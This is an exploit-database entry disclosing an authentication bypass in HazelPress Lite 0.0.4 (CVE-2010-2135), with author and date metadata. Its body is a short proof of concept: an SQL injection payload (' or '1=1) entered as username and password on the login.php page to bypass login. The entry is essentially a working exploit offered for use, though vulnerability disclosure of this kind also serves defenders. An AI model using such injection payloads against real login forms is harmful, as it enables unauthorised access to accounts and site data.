HazelPress Lite 0.0.4 - Authentication Bypass



EKU-ID: 18896 CVE: OSVDB-65129;CVE-2010-2135 OSVDB-ID:
Author: cr4wl3r Published: 2010-02-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1